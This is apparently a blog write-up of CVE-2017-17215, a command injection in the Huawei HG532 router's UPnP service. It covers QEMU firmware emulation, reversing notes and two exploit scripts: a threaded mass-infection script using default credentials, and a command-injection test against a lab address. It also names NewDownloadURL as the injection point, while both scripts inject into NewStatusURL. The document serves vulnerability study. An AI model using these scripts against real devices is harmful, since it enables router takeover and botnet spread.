CVE-2017-17215

工具: qemu-mips

description

Huawei HG532 with some customized versions has a remote code execution vulnerability. An authenticated attacker could send malicious packets to port 37215 to launch attacks. Successful exploit could lead to the remote execution of arbitrary code.

關鍵字: 37215

模擬

韌體檔案

先把映像檔載下來

  wget https://people.debian.org/~aurel32/qemu/mips/debian_squeeze_mips_standard.qcow2
  wget https://people.debian.org/~aurel32/qemu/mips/vmlinux-2.6.32-5-4kc-malta

網路配置

網橋創立

  sudo brctl addbr Virbr0
  sudo ifconfig Virbr0 192.168.10.1/24 up

增加tap0接口

  sudo tunctl -t tap0
  sudo ifconfig tap0 192.168.10.11/24 up
  sudo brctl addif Virbr0 tap0

創建虛擬機

  sudo qemu-system-mips -M malta -kernel vmlinux-2.6.32-5-4kc-malta -hda debian_squeeze_mips_standard.qcow2 -append "root=/dev/sda1 console=tty0" -netdev tap,id=tapnet,ifname=tap0,script=no -device rtl8139,netdev=tapnet -nographic

在虛擬機上設定網路

  ifconfig eth0 192.168.10.2/24 up
  ping 192.168.10.1 -c10

在本機端傳送檔案

  scp -r squashfs-root/ root@192.168.10.2:~/

掛載檔案

  mount -o bind /dev ./squashfs-root/dev
  mount -t proc /proc ./squashfs-root/proc

回到本機端設定

  ssh root@192.168.10.2
  chroot squashfs-root /bin/sh
  ./bin/upnp
  ./bin/mic

接著就會發現ip改變，ssh中斷，因此要改回去

  ifconfig eth0 192.168.10.2/24 up

最後模擬成功，可以去192.168.10.2看

PoC

import threading, sys, time, random, socket, re, os, struct, array, requests
from requests.auth import HTTPDigestAuth
ips = open(sys.argv[1], "r").readlines()
cmd = "" # Your MIPS (SSHD)
rm = "<?xml version=\"1.0\" ?>\n    <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n    <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n    <NewStatusURL>$(" + cmd + ")</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n    </s:Body>\n    </s:Envelope>"

class exploit(threading.Thread):
		def __init__ (self, ip):
			threading.Thread.__init__(self)
			self.ip = str(ip).rstrip('\n')
		def run(self):
			try:
				url = "http://" + self.ip + ":37215/ctrlt/DeviceUpgrade_1"
				requests.post(url, timeout=5, auth=HTTPDigestAuth('dslf-config', 'admin'), data=rm)
				print "[SOAP] Attempting to infect " + self.ip
			except Exception as e:
				pass

for ip in ips:
	try:
		n = exploit(ip)
		n.start()
		time.sleep(0.03)
	except:
		pass

可以看到注入點應該是NewDownloadURL，但問題是在哪裡?
- 往下看會看到NewDownloadURL是命令注射點

write up

尋找幾個關鍵字: 37215, NewDownloadURL
- 所以漏洞應該與/bin/upnp, /bin/mic有關
逆向/bin/upnp，並搜尋NewDownloadURL後會出現這個
- 可以看出ATP_XML_GetChildNodeByName功能是分析XML，並將結果字串丟到第三個參數，回傳值是成功與否
- 接著她可愛的程式碼沒經過任何處理就直接把字串拚一拚丟到system中
- 因此我們可以用xml建構一些壞東西

script.py

  import requests
  from requests.auth import HTTPDigestAuth


  data = '''
  <?xml version="1.0" ?>
   <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
     <NewStatusURL>;/bin/busybox ls -al;</NewStatusURL>
     <NewDownloadURL>HUAWEIUPNP</NewDownloadURL>
    </u:Upgrade>
   </s:Body>
  </s:Envelope>
  '''

  requests.post('http://192.168.10.2:37215/ctrlt/DeviceUpgrade_1',auth=HTTPDigestAuth('dslf-config', 'admin'),data=data)

結果(點到為止就好，剩下就是幹一個reverse shell出來，~~我累累病~~)

CVE-2017-17215

華為 HG532

CVE-2017-17215

description

模擬

PoC

write up

CATALOG

FEATURED TAGS

FRIENDS